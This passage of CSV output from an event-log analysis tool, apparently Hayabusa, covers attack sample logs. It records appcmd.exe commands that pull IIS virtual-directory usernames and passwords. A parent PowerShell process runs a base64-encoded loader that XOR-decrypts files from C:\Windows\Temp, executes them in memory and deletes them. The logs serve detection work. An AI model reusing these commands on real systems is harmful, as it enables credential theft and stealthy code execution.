AF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: 